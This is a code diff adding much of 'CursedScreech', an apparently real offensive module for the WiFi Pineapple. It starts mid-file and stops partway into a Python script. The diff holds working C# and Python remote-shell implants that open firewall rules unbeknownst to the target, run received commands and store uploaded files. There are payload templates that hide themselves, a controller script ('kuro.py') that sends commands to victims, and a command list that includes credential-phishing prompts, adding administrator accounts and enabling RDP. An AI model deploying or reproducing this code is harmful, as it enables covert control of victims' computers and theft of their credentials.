+			fwrite($fh, $k . ":" . $v . "\n");
+		}
+		fclose($fh);
+	}
+	
+	/* ============================ */
+	/*         MISCELLANEOUS        */
+	/* ============================ */
+	
+	private function respond($success, $msg = null, $data = null, $error = null) {
+		$this->response = array("success" => $success,"message" => $msg, "data" => $data, "error" => $error);
+	}
+	
+	/* ============================ */
+	/*         LOG FUNCTIONS        */
+	/* ============================ */
+	private function getLogs($type) {
+		$dir = ($type == "error") ? __LOGS__ : (($type == "targets") ? __TARGETLOGS__ : __CHANGELOGS__);
+		$contents = array();
+		foreach (scandir($dir) as $log) {
+			if (substr($log, 0, 1) == ".") {continue;}
+			array_push($contents, $log);
+		}
+		$this->respond(true, null, $contents);
+	}
+	
+	private function retrieveLog($logname, $type) {
+		$dir = ($type == "error") ? __LOGS__ : (($type == "help") ? __HELPFILES__ : (($type == "forest") ? __FOREST__ : (($type == "targets") ? __TARGETLOGS__ : __CHANGELOGS__)));
+		$data = file_get_contents($dir . $logname);
+		if (!$data) {
+			$this->respond(true, null, "");
+			return;
+		}
+		$this->respond(true, null, $data);
+	}
+	
+	private function clearLog($log,$type) {
+		$dir = ($type == "forest") ? __FOREST__ : (($type == "targets") ? __TARGETLOGS__ : "");
+		$fh = fopen($dir . $log, "w");
+		fclose($fh);
+		$this->respond(true);
+	}
+	
+	private function deleteLog($logname, $type) {
+		$dir = ($type == "error") ? __LOGS__ : (($type == "targets") ? __TARGETLOGS__ : __CHANGELOGS__);
+		$res = unlink($dir . $logname);
+		if (!$res) {
+			$this->respond(false, "Failed to delete log.");
+			return;
+		}
+		$this->respond(true);
+	}
+	
+	private function logError($filename, $data) {
+		$time = exec("date +'%H_%M_%S'");
+		$fh = fopen(__LOGS__ . str_replace(" ","_",$filename) . "_" . $time . ".txt", "w+");
+		fwrite($fh, $data);
+		fclose($fh);
+	}
+	
+	/* ===================================================== */
+	/*         KEY FUNCTIONS TO INTERFACE WITH PAPERS        */
+	/* ===================================================== */
+	
+	private function loadCertificates() {
+		$certs = $this->getKeys(__SSLSTORE__);
+		$this->respond(true,null,$certs);
+	}
+	
+	private function getKeys($dir) {
+		$keyType = "TLS/SSL";
+		$keys = scandir($dir);
+		$certs = array();
+		foreach ($keys as $key) {
+			if (substr($key, 0, 1) == ".") {continue;}
+
+			$parts = explode(".", $key);
+			$fname = $parts[0];
+			$type = "." . $parts[1];
+
+			// Check if the object name already exists in the array
+			if ($this->objNameExistsInArray($fname, $certs)) {
+				foreach ($certs as &$obj) {
+					if ($obj->Name == $fname) {
+						$obj->Type .= ", " . $type;
+					}
+				}
+			} else {
+				// Add a new object to the array
+				$enc = ($this->keyIsEncrypted($fname)) ? "Yes" : "No";
+				array_push($certs, (object)array('Name' => $fname, 'Type' => $type, 'Encrypted' => $enc, 'KeyType' => $keyType));
+			}
+		}
+		return $certs;
+	}
+	
+	private function objNameExistsInArray($name, $arr) {
+		foreach ($arr as $x) {
+			if ($x->Name == $name) {
+				return True;
+			}
+		}
+		return False;
+	}
+	
+	private function keyIsEncrypted($keyName) {
+		$data = array();
+		$keyDir = __SSLSTORE__;
+		exec(__SCRIPTS__ . "testEncrypt.sh -k " . $keyName . " -d " . $keyDir . " 2>&1", $data);
+		if ($data[0] == "writing RSA key") {
+			return false;
+		} else if ($data[0] == "unable to load Private Key") {
+			return true;
+		}
+	}
+}

modules/src/CursedScreech/includes/api/cs/PineappleModules.cs

@@ -0,0 +1,390 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.IO;
+using System.Linq;
+using System.Net;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Reflection;
+using System.Security.Authentication;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+using System.Threading.Tasks;
+using System.Windows.Forms;
+
+namespace PineappleModules
+{
+    /*
+     * 
+     * Class:   CursedScreech
+     * Author:  sud0nick
+     * Created: March 3, 2016
+     * Updated: September 17, 2016
+     * 
+     * A class that sets up a multicast thread to broadcast back
+     * to the Pineapple on which port it is listening, sets up a
+     * server thread for executing remote shell commands secured via
+     * TLS 1.2, and establishes firewall rules to perform said actions
+     * unbeknownst to the target.
+     * 
+    */
+    public class CursedScreech
+    {
+        // ==================================================
+        //                 CLASS ATTRIBUTES
+        // ==================================================
+        private SslStream sslStream;
+        private string msg = "";
+        private int lport = 0;
+        private static string certSerial = "";
+        private static string certHash = "";
+        private string command = "";
+        private Boolean recvFile = false;
+        private byte[] fileBytes;
+        private int fileBytesLeftToRead = 0;
+        private string fileName = "";
+        private string storeDir = "";
+        private readonly string exePath = System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName;
+        private readonly string exeName = Path.GetFileNameWithoutExtension(System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName);
+
+        // ==================================================
+        //            CURSED SCREECH INITIALIZER
+        // ==================================================
+	    public CursedScreech() {
+
+            // Get the current path and name of the executable to set up rules for it in the firewall
+            string addTCPRule = "netsh advfirewall firewall add rule name=\"" + exeName + "\" program=\"" + exePath + "\" protocol=TCP dir=in localport=xxxxx action=allow";
+            string delFirewallRule = "netsh advfirewall firewall delete rule name=\"" + exeName + "\"";
+
+            // Generate a random port on which to listen for commands from Kuro
+            Random rnd = new Random();
+            lport = rnd.Next(10000, 65534);
+
+            // Delete old firewall rules
+            exec(delFirewallRule);
+
+            // Add new firewall rule
+            exec(addTCPRule.Replace("xxxxx", lport.ToString()));
+        }
+
+        // ===========================================================
+        //   OPTIONAL METHODS TO SET EXPECTED CERTIFICATE PROPERTIES
+        // ===========================================================
+        public void setRemoteCertificateHash(string hash) {
+            certHash = hash;
+        }
+
+        public void setRemoteCertificateSerial(string serial) {
+            certSerial = serial;
+        }
+
+        // ==================================================
+        //        METHOD TO START THE MULTICAST THREAD
+        // ==================================================
+        public void startMulticaster(string address, int port, int heartbeatInterval = 5) {
+            string addUDPRule = "netsh advfirewall firewall add rule name=\"" + exeName + "\" program=\"" + exePath + "\" protocol=UDP dir=out localport=" + port + " action=allow";
+            exec(addUDPRule);
+            new Thread(() => {
+                
+                UdpClient udpclient = new UdpClient(port);
+                IPAddress mcastAddr = IPAddress.Parse(address);
+                udpclient.JoinMulticastGroup(mcastAddr);
+                IPEndPoint kuro = new IPEndPoint(mcastAddr, port);
+                
+                while (true) {
+                    Byte[] buffer = null;
+                    string localIP = localAddress();
+                    if (localIP.Length == 0) {
+                        localIP = "0.0.0.0";
+                    }
+
+                    // If a message is available to be sent then do so
+                    if (msg.Length > 0) {
+                        msg = "msg:" + msg;
+
+                        buffer = Encoding.ASCII.GetBytes(msg);
+                        udpclient.Send(buffer, buffer.Length, kuro);
+                        msg = "";
+                    }
+
+                    // Send the listening socket information to Kuro
+                    buffer = Encoding.ASCII.GetBytes(localIP + ":" + lport.ToString());
+                    udpclient.Send(buffer, buffer.Length, kuro);
+                    //Console.WriteLine("Sent heartbeat to Kuro");
+
+                    // Sleep for however long the heartbeat interval is set
+                    Thread.Sleep(heartbeatInterval * 1000);
+                }
+            }).Start();
+        }
+
+        // ====================================================
+        //  MULTITHREADED SECURE LISTENER WITH SHELL EXECUTION
+        // ====================================================
+        public void startSecureServerThread(string key, string keyPassword) {
+            new Thread(() => startSecureServer(key, keyPassword)).Start();
+	    }
+
+        // ====================================================
+        //               BLOCKING SECURE SERVER
+        // ====================================================
+        public void startSecureServer(string key, string keyPassword) {
+
+            // Create a socket for the listener
+            IPAddress ipAddress = IPAddress.Parse("0.0.0.0");
+            IPEndPoint localEndPoint = new IPEndPoint(ipAddress, lport);
+            TcpListener listener = new TcpListener(localEndPoint);
+
+            // Read the certificate information from file.  This should be a .pfx container
+            // with a private and public key so we can be verified by Kuro
+            X509Certificate2 csKey = loadKeys(key, keyPassword);
+
+            // Tell the thread to operate in the background
+            Thread.CurrentThread.IsBackground = true;
+
+            bool connected = false;
+            TcpClient client = new TcpClient();
+            Int32 numBytesRecvd = 0;
+            try {
+
+                // Start listening
+                listener.Start();
+
+                while (true) {
+                    // Begin listening for connections
+                    client = listener.AcceptTcpClient();
+
+                    try {
+                        this.sslStream = new SslStream(client.GetStream(), false, atkCertValidation);
+                        this.sslStream.AuthenticateAsServer(csKey, true, (SslProtocols.Tls12 | SslProtocols.Tls11 | SslProtocols.Tls), false);
+
+                        connected = true;
+                        while (connected) {
+                            byte[] cmdRecvd = new Byte[4096];
+
+                            numBytesRecvd = this.sslStream.Read(cmdRecvd, 0, cmdRecvd.Length);
+
+                            if (numBytesRecvd < 1) {
+                                connected = false;
+                                client.Close();
+                                break;
+                            }
+
+                            // If a file is being received we don't want to decode the data because we
+                            // need to store the raw bytes of the file
+                            if (this.recvFile) {
+
+                                int numBytesToCopy = cmdRecvd.Length;
+                                if (this.fileBytesLeftToRead < cmdRecvd.Length) {
+                                    numBytesToCopy = this.fileBytesLeftToRead;
+                                }
+
+                                // Append the received bytes to the fileBytes array
+                                System.Buffer.BlockCopy(cmdRecvd, 0, this.fileBytes, (this.fileBytes.Length - this.fileBytesLeftToRead), numBytesToCopy);
+                                this.fileBytesLeftToRead -= numBytesRecvd;
+
+                                // If we have finished reading the file, store it on the system
+                                if (this.fileBytesLeftToRead < 1) {
+
+                                    // Let the system know we've received the whole file
+                                    this.recvFile = false;
+
+                                    // Store the file on the system
+                                    storeFile(this.storeDir, this.fileName, this.fileBytes);
+                                    
+                                    // Clear the fileName and fileBytes variables
+                                    this.fileName = "";
+                                    this.fileBytes = new Byte[1];
+                                }
+
+                            } else {
+                                // Assign the decrytped message to the command string
+                                this.command = Encoding.ASCII.GetString(cmdRecvd, 0, numBytesRecvd);
+
+                                Thread shellThread = new Thread(() => sendMsg());
+                                shellThread.Start();
+                            }
+                        }
+                    }
+                    catch (Exception) {
+                        connected = false;
+                        client.Close();
+                        break;
+                    }
+                }
+            }
+            catch (Exception) { }
+        }
+
+        // ==================================================
+        //            METHOD TO SEND DATA TO KURO
+        // ==================================================
+        private void sendMsg() {
+            string msg = this.command;
+            this.command = "";
+
+            // Check if we are about to receive a file and prepare
+            // the appropriate variables to receive it
+            // Msg format is sendfile:fileName:byteArraySize
+            if (msg.Contains("sendfile;")) {
+
+                this.recvFile = true;
+                string[] msgParts = msg.Split(';');
+                this.fileName = msgParts[1];
+                this.fileBytesLeftToRead = Int32.Parse(msgParts[2]);
+                this.storeDir = msgParts[3];
+                this.fileBytes = new Byte[this.fileBytesLeftToRead];
+
+            } else {
+
+                // If we are not expecting a file we simply execute
+                // the received command in the shell and return the results
+                string ret = exec(msg);
+                if (ret.Length > 0) {
+                    byte[] retMsg = Encoding.ASCII.GetBytes(ret);
+                    this.sslStream.Write(retMsg, 0, retMsg.Length);
+                }
+            }
+        }
+
+        // ==================================================
+        //         METHOD TO GET THE LOCAL IP ADDRESS
+        // ==================================================
+        private string localAddress() {
+            IPHostEntry host = Dns.GetHostEntry(Dns.GetHostName());
+            foreach (IPAddress ip in host.AddressList) {
+                if (ip.AddressFamily == AddressFamily.InterNetwork) {
+                    return ip.ToString();
+                }
+            }
+            return "";
+        }
+
+        // ==================================================
+        //         METHOD TO EXECUTE A SHELL COMMAND
+        // ==================================================
+        private static string exec(string args) {
+            System.Diagnostics.Process proc = new System.Diagnostics.Process();
+            System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
+            startInfo.CreateNoWindow = true;
+            startInfo.UseShellExecute = false;
+            startInfo.RedirectStandardOutput = true;
+            startInfo.FileName = "cmd.exe";
+            startInfo.Arguments = "/C " + args;
+            proc.StartInfo = startInfo;
+            proc.Start();
+            proc.WaitForExit(2000);
+            return proc.StandardOutput.ReadToEnd();
+        }
+
+        // ==================================================
+        //          METHOD TO STORE A RECEIVED FILE 
+        // ==================================================
+        private void storeFile(string dir, string name, byte[] file) {
+            // If the directory doesn't exist, create it
+            Directory.CreateDirectory(dir);
+
+            // Write the file out to the directory
+            File.WriteAllBytes(dir + name, file);
+
+            // Tell Kuro the file was stored
+            byte[] retMsg = Encoding.ASCII.GetBytes("Received and stored file " + name + " in directory " + dir);
+            this.sslStream.Write(retMsg, 0, retMsg.Length);
+        }
+
+        // ==================================================
+        //           METHOD TO LOAD KEYS FROM A PFX
+        // ==================================================
+        private X509Certificate2 loadKeys(string key, string password) {
+            var certStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(key);
+            byte[] bytes = new byte[certStream.Length];
+            certStream.Read(bytes, 0, bytes.Length);
+            return new X509Certificate2(bytes, password);
+        }
+
+        // ==================================================
+        //        METHOD TO VERIFY KURO'S CERTIFICATE
+        // ==================================================
+        private static bool atkCertValidation(Object sender, X509Certificate cert, X509Chain chain, SslPolicyErrors sslPolicyErrors) {
+            //Console.WriteLine(BitConverter.ToString(cert.GetSerialNumber()));
+            //Console.WriteLine(cert.GetCertHashString());
+            if (certSerial != "") {
+                if (BitConverter.ToString(cert.GetSerialNumber()) != certSerial) { return false; }
+            }
+            if (certHash != "") {
+                if (cert.GetCertHashString() != certHash) { return false; }
+            }
+            if (sslPolicyErrors == SslPolicyErrors.None) { return true; }
+            if (sslPolicyErrors == SslPolicyErrors.RemoteCertificateChainErrors) { return true; }
+            return false;
+        }
+    }
+
+
+
+    /*
+     * 
+     * Class:   PA_Authorization
+     * Author:  sud0nick
+     * Date:    July 16, 2016
+     * 
+     * A class for interacting with Portal Auth Shell Server
+     * This class simply connects back to the PASS script on
+     * the Pineapple, supplies some system info, and retrieves
+     * an access key for the victim to log on to the portal.
+     * 
+    */
+
+    public class PA_Authorization {
+        private string rHost;
+        private int rPort;
+        private string accessKey = "";
+
+        public PA_Authorization(string remoteHost = "172.16.42.1", int remotePort = 4443) {
+            rHost = remoteHost;
+            rPort = remotePort;
+        }
+
+        public string getAccessKey() {
+            // Establish a new socket to connect back to the Pineapple
+            TcpClient c_bk = new TcpClient();
+
+            try {
+                c_bk.Connect(rHost, rPort);
+            }
+            catch {
+                return "";
+            }
+            
+            
+            NetworkStream pa_stream = c_bk.GetStream();
+
+            // Send system information to PortalAuth
+            string systemInfo = "0;" + System.Environment.MachineName + ";" + System.Environment.OSVersion;
+            byte[] sysinfo = Encoding.ASCII.GetBytes(systemInfo);
+            pa_stream.Write(sysinfo, 0, sysinfo.Length);
+
+            // Get the access key back from PortalAuth
+            byte[] msgRecvd = new Byte[1024];
+            Int32 bytesRecvd = 0;
+            bytesRecvd = pa_stream.Read(msgRecvd, 0, msgRecvd.Length);
+
+            if (bytesRecvd < 1) {
+                c_bk.Close();
+                return "";
+            }
+            else {
+                accessKey = Encoding.ASCII.GetString(msgRecvd, 0, bytesRecvd);
+            }
+
+            // Close the connection
+            c_bk.Close();
+
+            // Return accessKey with either an error message or the key that was received
+            return accessKey;
+        }
+    }
+}

modules/src/CursedScreech/includes/api/cs/template/payload.cs

@@ -0,0 +1,24 @@
+using System;
+using System.Drawing;
+using System.Windows.Forms;
+using CursedScreech;
+
+namespace Payload
+{
+    public partial class Form1 : Form {
+
+        public Form1() {
+            InitializeComponent();
+            
+			CursedScreech.CursedScreech cs = new CursedScreech.CursedScreech();
+            cs.startMulticaster("IPAddress", mcastport, hbinterval);
+            cs.setRemoteCertificateSerial("serial");
+            cs.setRemoteCertificateHash("fingerprint");
+            cs.startSecureServerThread("privateKey", "password");
+        }
+        private void Form1_FormClosing(object sender, FormClosingEventArgs e) {
+            e.Cancel = true;
+            this.Hide();
+        }
+    }
+}

modules/src/CursedScreech/includes/api/cs/template/payloadAuth.cs

@@ -0,0 +1,44 @@
+using System;
+using System.Drawing;
+using System.Windows.Forms;
+using PineappleModules;
+
+namespace Payload
+{
+    public partial class Form1 : Form {
+		
+		PA_Authorization pauth = new PA_Authorization();
+
+        public Form1() {
+            InitializeComponent();
+            
+			CursedScreech cs = new CursedScreech();
+            cs.startMulticaster("IPAddress", mcastport, hbinterval);
+            cs.setRemoteCertificateSerial("serial");
+            cs.setRemoteCertificateHash("fingerprint");
+            cs.startSecureServerThread("privateKey", "password");
+        }
+        private void Form1_FormClosing(object sender, FormClosingEventArgs e) {
+            e.Cancel = true;
+            this.Hide();
+        }
+		
+		private void accessKeyButton_Click(object sender, EventArgs e) {
+			
+			// Request an access key from the Pineapple
+            string key = pauth.getAccessKey();
+
+            // Check if a key was returned
+            string msg;
+            if (key.Length > 0) {
+                msg = "Your access key is unique to you so DO NOT give it away!\n\nAccess Key: " + key;
+            }
+            else {
+                msg = "Failed to retrieve an access key from the server.  Please try again later.";
+            }
+
+            // Display message to the user
+            MessageBox.Show(msg);
+		}
+    }
+}

modules/src/CursedScreech/includes/api/python/PineappleModules.py

@@ -0,0 +1,152 @@
+import time
+import subprocess
+from random import randint
+import platform
+import threading
+import sys
+from ssl import *
+from socket import *
+
+class CursedScreech:
+
+	def __init__(self, progName):
+		self.ProgName = progName
+		self.msg = ""
+		self.lport = 0
+		self.certSerial = ""
+		self.threads = []
+		
+	
+	# ==================================================
+	#        METHOD TO START THE MULTICAST THREAD
+	# ==================================================
+	def startMulticaster(self, addr, port, heartbeatInterval = 5):
+		# Set up a heartbeat thread
+		hbt = threading.Thread(target=self.sendHeartbeat, args=(addr,port,heartbeatInterval))
+		self.threads.append(hbt)
+		hbt.start()
+		
+	
+	# ====================================================
+	#  MULTITHREADED SECURE LISTENER WITH SHELL EXECUTION
+	# ====================================================
+	def startSecureServerThread(self, keyFile, certFile, remoteCert):
+		sst = threading.Thread(target=self.startSecureServer, args=(keyFile,certFile,remoteCert))
+		self.threads.append(sst)
+		sst.start()
+		
+	# ========================================================
+	#   METHOD TO SET THE EXPECTED CERTIFICATE SERIAL NUMBER
+	# ========================================================
+	def setRemoteCertificateSerial(self, serial):
+		self.certSerial = serial
+		
+		
+	# ======================================
+	#           HEARTBEAT THREAD
+	# ======================================
+	def sendHeartbeat(self, MCAST_GROUP, MCAST_PORT, hbInterval):
+		
+		# Add a firewall rule in Windows to allow outbound UDP packets
+		addUDPRule = "netsh advfirewall firewall add rule name=\"" + self.ProgName + "\" protocol=UDP dir=out localport=" + str(MCAST_PORT) + " action=allow";
+		subprocess.call(addUDPRule, shell=True, stdout=subprocess.PIPE)
+		
+		# Set up a UDP socket for multicast
+		sck = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)
+		sck.setsockopt(IPPROTO_IP, IP_MULTICAST_TTL, 2)
+		
+		# Infinitely loop and send a broadcast to MCAST_GROUP with our
+		# listener's IP and port information.
+		while True:
+			ip = gethostbyname(gethostname())
+			if len(self.msg) > 0:
+				sck.sendto("msg:" + self.msg, (MCAST_GROUP, MCAST_PORT))
+				
+				# Clear out the message
+				self.msg=""
+			
+			sck.sendto(ip + ":" + str(self.lport), (MCAST_GROUP, MCAST_PORT))
+			time.sleep(hbInterval)
+	
+	
+	# ===================================================
+	#    BLOCKING SECURE LISTENER WITH SHELL EXECUTION
+	# ===================================================
+	def startSecureServer(self, keyFile, certFile, remoteCert):
+	
+		# Create a listener for the secure shell
+		ssock = socket(AF_INET, SOCK_STREAM)
+		ssock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
+		listener = wrap_socket(ssock, ssl_version=PROTOCOL_SSLv23, keyfile=keyFile, certfile=certFile, cert_reqs=CERT_REQUIRED, ca_certs=remoteCert)
+		
+		# Pick a random port number on which to listen and attempt to bind to it
+		# If it is already in use simply continue the process until an available
+		# port is found.
+		bound = False
+		while bound == False:
+			self.lport = randint(30000, 65534)
+			try:
+				listener.bind((gethostname(), self.lport))
+				bound = True
+			except:
+				bound = False
+				continue
+				
+		# Set up rules in the firewall to allow connections from this program
+		addTCPRule = "netsh advfirewall firewall add rule name=\"" + self.ProgName + "\" protocol=TCP dir=in localport=xxxxx action=allow";
+		delFirewallRule = "netsh advfirewall firewall delete rule name=\"" + self.ProgName + "\"";
+		
+		try:
+			# Delete old firewall rules if they exist
+			subprocess.call(delFirewallRule, shell=True, stdout=subprocess.PIPE)
+	
+			# Add a firewall rule to Windows Firewall that allows inbound connections on the port
+			addTCPRule = addTCPRule.replace('xxxxx', str(self.lport))
+			subprocess.call(addTCPRule, shell=True, stdout=subprocess.PIPE)
+		except:
+			pass
+			
+		listener.listen(5)
+		connected = False
+		
+		# Begin accepting connections and pass all commands to execShell in a separate thread
+		while 1:
+			if not connected:
+				(client, address) = listener.accept()
+				connected = True
+		
+				# Verify the client's certificate.  If the serial number doesn't match
+				# kill the connection and wait for a new one.
+				if len(self.certSerial) > 0:
+					cert = client.getpeercert()
+					if not cert['serialNumber'] == self.certSerial:
+						connected = False
+						self.msg = "[!] Unauthorized access attempt on target " + gethostbyname(gethostname()) + ":" + str(self.lport)
+						continue
+			while 1:
+				try:
+					cmd = client.recv(4096)
+					
+					if not len(cmd):
+						connected = False
+						break
+						
+					shellThread = threading.Thread(target=self.execShellCmd, args=(client,cmd))
+					self.threads.append(shellThread)
+					shellThread.start()
+				except:
+					connected = False
+					break
+
+		listener.close()
+		
+		
+	# ======================================
+	#         EXECUTE A CMD IN SHELL
+	# ======================================
+	def execShellCmd(self, sock, cmd):
+		proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
+		stdout_value = proc.stdout.read() + proc.stderr.read()
+		sock.sendall(stdout_value)
+		
+		

modules/src/CursedScreech/includes/api/python/template/payload.py

@@ -0,0 +1,6 @@
+from PineappleModules import CursedScreech
+
+cs = CursedScreech("Network Client")
+cs.startMulticaster("IPAddress", mcastport, hbinterval)
+cs.setRemoteCertificateSerial("serial")
+cs.startSecureServerThread("privateKey", "publicKey", "kuroKey")

modules/src/CursedScreech/includes/changelog/Version 1.0

@@ -0,0 +1 @@
+March 03, 2016 - Module released.

modules/src/CursedScreech/includes/changelog/Version 1.1

@@ -0,0 +1,6 @@
+July 30, 2016
+<br /><br />
+ - Updated API to include a class which hooks into PortalAuth's Payloader injection set to force authorization.  This ensures the target executes the payload in order to get access to the network.
+<br /><br />
+ - Added a checkbox under settings to automatically include authorization code in the payload source.<br /><br />
+ - Added the ability to select the interface on which sein will listen.  This fixes the bug where targets would not appear on the Pineapple network.

modules/src/CursedScreech/includes/changelog/Version 1.2

@@ -0,0 +1,9 @@
+September 17, 2016
+<br /><br />
+ - Updated C# API to support receiving and storing of files on target machines<br />
+ - Updated UI<br />
+ - Added file upload option to import payloads<br />
+ - Added 'Send File' EZ Cmd to send payloads to target machines<br />
+ - Made the module less of a resource hog when Sein and Kuro aren't running<br />
+ - Fixed bug where certificate store would not properly identify a key as encrypted<br />
+ - Added feature so encrypted keys can not be selected for Kuro in the certificate store

modules/src/CursedScreech/includes/changelog/Version 1.3

@@ -0,0 +1,5 @@
+January 5, 2018
+<br /><br />
+ - Modified hook into Papers to work with the latest release<br />
+ - Added ability to install a certificate on a target Windows machine<br />
+ 

modules/src/CursedScreech/includes/changelog/Version 1.4

@@ -0,0 +1,4 @@
+January 12, 2018
+<br /><br />
+ - Updated upload functionality to include better responses if uploads fail<br />
+ 

modules/src/CursedScreech/includes/changelog/Version 1.5

@@ -0,0 +1,4 @@
+July 15, 2018
+<br /><br />
+ - Added check for targetlogs directory at startup<br />
+ 

modules/src/CursedScreech/includes/changelog/Version 1.6

@@ -0,0 +1,4 @@
+December 26, 2019
+<br /><br />
+ - Fixed bug in latest firmware that saved module settings in an invalid state causing issues when running Sein.<br />
+ 

modules/src/CursedScreech/includes/forest/ezcmds

@@ -0,0 +1,16 @@
+Send File:C:\Temp\
+Install Cert:powershell "Import-Certificate -FilePath $cert -CertStoreLocation $store"
+Get PS Version:powershell "$PSVersionTable"
+Get SysInfo:powershell "gwmi Win32_QuickFixEngineering | Select Description, HotFixID, InstalledBy, InstalledOn; gwmi Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, BootDevice, BuildNumber, CSName, CSDVersion, NumberOfUsers, Version | FL"
+Windows PSv3+ Phish:powershell "Get-Credential -User $(whoami).Split('\')[1] -Message 'Windows requires your credentials to continue' | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}"
+Windows PSv2- Phish:powershell "Get-Credential | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}"
+Windows Alert:powershell "[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Message', 'Title')"
+Logoff User:shutdown /l
+Restart:powershell "Restart-Computer"
+Shutdown:powershell "Stop-Computer"
+Add User:net user <USER> <PASSWORD> /ADD
+Change User Password:net user <USER> <PASSWORD>
+Delete User:net user <USER> /DELETE
+Enable RDP:powershell "$key='HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'; if (!(Test-Path $key)) { New-Item -Path $key -Force | Out-Null }; New-ItemProperty -Path $key -Name 'fDenyTSConnections' -PropertyType 'DWORD' -Value 0 -Force | Out-Null; netsh advfirewall firewall set rule group='remote desktop' new enable=yes"
+Add User to Remote Desktop Users Group:net localgroup "Remote Desktop Users" /ADD "<user>"
+Add User to Administrators Group:net localgroup "Administrators" /ADD "<user>"

modules/src/CursedScreech/includes/forest/kuro.py

@@ -0,0 +1,162 @@
+# Kuro looms up ahead, won't allow us to pass.
+# Let us not travel further, lest we unleash her wrath.
+# Her screech can be heard from atop her perch,
+# commanding those fallen under her curse.
+
+import select
+import sys
+import threading
+from target import Target
+
+# Pull settings from file
+settingsFile = "/pineapple/modules/CursedScreech/includes/forest/settings"
+target_list = ""
+activity_log = ""
+cmd_list = ""
+settings = {}
+with open(settingsFile, "r") as sFile:
+	for line in sFile:
+		params = line.strip("\n").split("=")
+		if params[0] == "target_list":
+			target_list = params[1]
+		elif params[0] == "activity_log":
+			activity_log = params[1]
+		elif params[0] == "cmd_list":
+			cmd_list = params[1]
+		else:
+			pass
+			
+def logActivity(msg):
+	with open(activity_log, "a") as log:
+		log.write(msg + "\n")
+		
+def connectTarget(ip, port):
+	target = Target(ip, int(port))
+	target.secureConnect()
+	if target.isConnected():
+		return target
+	else:
+		return False
+		
+# A list for target objects and threads on which to receive data
+targets = []
+threads = []
+killThreads = False
+
+def recvOnTarget(t):
+	global killThreads
+	while True:
+		if killThreads == True:
+			break
+			
+		try:
+			ready = select.select([t.socket], [], [], 5)
+			if ready[0]:
+				t.recv()
+		except:
+			break
+
+# Function to disconnect all targets and quit
+def cleanUp(targets):
+	# Close all sockets
+	print "[>] Cleaning up sockets"
+	logActivity("[>] Cleaning up sockets")
+
+	# Attempt to kill the thread
+	global killThreads
+	killThreads = True
+
+	for target in targets:
+		target.disconnect()
+
+# Attempt to connect to all targets and store them in the targets list
+with open(target_list, "r") as targetFile:
+	for t in targetFile:
+
+		# Strip newline characters from the line
+		t = t.strip("\n")
+
+		try:
+			ip = t.split(":")[0]
+			port = t.split(":")[1]
+		
+			# Connect to the target and append the socket to our list
+			newTarget = connectTarget(ip, port)
+			if newTarget != False:
+				newThread = threading.Thread(target=recvOnTarget, args=(newTarget,))
+				threads.append(newThread)
+				newThread.start()
+				targets.append(newTarget)
+
+		except KeyboardInterrupt:
+			print "Interrupt detected.  Moving to next target..."
+			continue;
+
+quitFlag = False
+if len(targets) > 0:
+	try:
+		logActivity("[!] Kuro is ready")
+		while True:
+			
+			# Read from the target list to see if any new targets are
+			# available.  If so, attempt to connect to them.
+			with open(target_list, "r") as targetFile:
+				for line in targetFile:
+					skip = False
+					line = line.strip("\n")
+					ip = line.split(":")[0]
+					port = line.split(":")[1]
+					
+					# If the address is found in the target list, check if
+					# the port is the same
+					if any(t.addr == ip for t in targets):
+						for t in targets:
+							# If the ip address matches but the port does not
+							# disconnect the target and remove it from the list
+							if t.addr == ip and t.port != int(port):
+								t.disconnect()
+								targets.remove(t)
+								
+								# Recreate the target object, connect to it, and
+								# add it back to the list
+								newTarget = connectTarget(ip, port)
+								if newTarget != False:
+									newThread = threading.Thread(target=recvOnTarget, args=(newTarget,))
+									threads.append(newThread)
+									newThread.start()
+									targets.append(newTarget)
+					else:
+						newTarget = connectTarget(ip, port)
+						if newTarget != False:
+							newThread = threading.Thread(target=recvOnTarget, args=(newTarget,))
+							threads.append(newThread)
+							newThread.start()
+							targets.append(newTarget)
+			
+			# Read from cmd.log, send to targets listed, and clear
+			# the file for next use.
+			with open(cmd_list, "r") as cmdFile:
+				for line in cmdFile:
+					params = line.strip("\n").rsplit(":", 1)
+					cmd = params[0]
+					addr = params[1]
+					
+					# Check if Kuro received a command to end her own process
+					if cmd == "killyour" and addr == "self":
+						quitFlag = True
+					else:
+						for t in targets:
+							if t.addr == addr and t.isConnected:
+								t.send(cmd)
+								
+			# Clear the file
+			open(cmd_list, "w").close()
+				
+			# Check if it's time to quit
+			if quitFlag:
+				break
+				
+	except KeyboardInterrupt:
+		pass
+
+cleanUp(targets)

modules/src/CursedScreech/includes/forest/sein.py

@@ -0,0 +1,122 @@
+import socket
+import struct
+import sys
+from target import Target
+import threading
+import time
+
+# Load settings from file and assign to vars
+settingsFile = "/pineapple/modules/CursedScreech/includes/forest/settings"
+MCAST_GROUP = IFACE = target_list = activity_log = ""
+MCAST_PORT = hbInterval = 0
+settings = {}
+with open(settingsFile, "r") as sFile:
+	for line in sFile:
+		params = line.strip("\n").split("=")
+		if params[0] == "target_list":
+			target_list = params[1]
+		elif params[0] == "activity_log":
+			activity_log = params[1]
+		elif params[0] == "mcast_group":
+			MCAST_GROUP = params[1]
+		elif params[0] == "mcast_port":
+			MCAST_PORT = int(params[1])
+		elif params[0] == "hb_interval":
+			hbInterval = int(params[1])
+		elif params[0] == "iface_ip":
+			IFACE = params[1]
+		else:
+			pass
+			
+# Default to a heartbeat of 5 seconds
+# if one has not been set in file
+if hbInterval == 0:
+	hbInterval = 5
+
+# Function to determine if a target exists in the supplied list
+def targetExists(tgt,l):
+	for t in l:
+		if tgt in t.addr:
+			return True
+	return False
+
+def logActivity(msg):
